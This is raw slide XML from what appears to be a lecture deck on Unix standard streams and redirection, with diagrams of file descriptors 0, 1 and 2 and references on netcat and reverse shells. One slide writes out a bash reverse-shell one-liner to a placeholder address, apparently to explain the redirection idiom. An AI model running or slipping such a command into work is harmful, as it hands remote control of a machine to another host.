                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100"/>
              <a:t>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Isosceles Triangle 2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58254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04ABA-149E-4CE9-98C4-9F02F632CB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Assignment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EA50D0-5E99-4B50-89D5-EB025B709D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399351286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342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Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Standard_streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.brianstorti.com/understanding-shell-script-idiom-redirect/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.computerhope.com/unix/nc.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378201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753199-C999-4C1F-8E71-71D4B05B93DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Input and output devices are files (0,1,2)!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006568" y="2428139"/>
            <a:ext cx="5689840" cy="3647732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612186" y="3584844"/>
            <a:ext cx="2017381" cy="1087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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313482" y="3014715"/>
            <a:ext cx="2017514" cy="72801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t>Keyboard/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313482" y="4308470"/>
            <a:ext cx="1806872" cy="72801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t>Display/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4448980" y="3277852"/>
            <a:ext cx="1741706" cy="81552"/>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3020384" y="3128571"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855063" y="4308470"/>
            <a:ext cx="2458419" cy="364005"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Elbow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5006568" y="4920263"/>
            <a:ext cx="1306914" cy="31597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15822" y="3874919"/>
            <a:ext cx="1691489" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2892657" y="5057935"/>
            <a:ext cx="2060179" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>err output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7948123A-D870-4BDE-9461-61E542D4231B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617366" y="1885730"/>
            <a:ext cx="2831614" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FILE_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DESCRIPTOR 0,1,2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{668D3B19-1B49-4642-AA68-914F4B576A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3033173" y="2255062"/>
            <a:ext cx="225842" cy="759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8817267-0AE1-4201-B235-FE819981F7BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3033173" y="2255062"/>
            <a:ext cx="176265" cy="1757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AD02304-3AA7-4BE6-ADE4-9A6A9AD6BDEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3020385" y="2255062"/>
            <a:ext cx="12788" cy="2724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Graphic 20" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B751FF-E3B2-4E2C-9A07-0B8C74975A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0282" y="3029594"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Graphic 22" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193E8457-634C-4969-8489-9B765DF3E7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25865" y="3810178"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C53C358-2B72-4BAB-A0E3-60E4D8B80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61192" y="4779037"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Elbow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF64E2B-67BE-486D-8D10-C772477498DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620877" y="4672476"/>
            <a:ext cx="1267883" cy="61629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756F8C3-3F4E-45B7-BE04-DD7F97537D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2607073" y="4147440"/>
            <a:ext cx="743192" cy="78500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D77B53-BE89-4FFD-BF82-B11ACA988712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2334128" y="3508684"/>
            <a:ext cx="658544" cy="23544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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4FB5A9-3D63-1490-9F12-FA8A4270B582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407573" y="1392572"/>
            <a:ext cx="3251200" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96927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Standard output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631527" y="2333144"/>
            <a:ext cx="2017381" cy="1087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echo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648908" y="2876960"/>
            <a:ext cx="1141554" cy="123330"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604877" y="2238001"/>
            <a:ext cx="1415772" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455421" y="2055336"/>
            <a:ext cx="5982535" cy="2730881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBAAEF-47FD-4233-BA5D-FEFD81D7C1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4964" y="2543090"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87D0A159-7E14-4BF7-9CB0-3297C5F40739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4313866" y="3070628"/>
            <a:ext cx="1141554" cy="123330"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Graphic 2" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCCEF90-E352-1AA6-AF03-BD9A49205B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681" y="3985846"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE24E55-EC09-A96F-1CAC-D881D36537A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1527777" y="3420776"/>
            <a:ext cx="112441" cy="642456"/>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6" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7166D24-8FC4-F263-22CA-7A0BD1ACF199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058723" y="3489398"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8C9AD7-C4A6-D958-F5F0-30F414F05EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8044405" y="1296365"/>
            <a:ext cx="2750240" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default input and output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9ECA26E-7BFF-984F-990C-A347AA865302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7917084" y="1696475"/>
            <a:ext cx="1502441" cy="6366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89025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Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
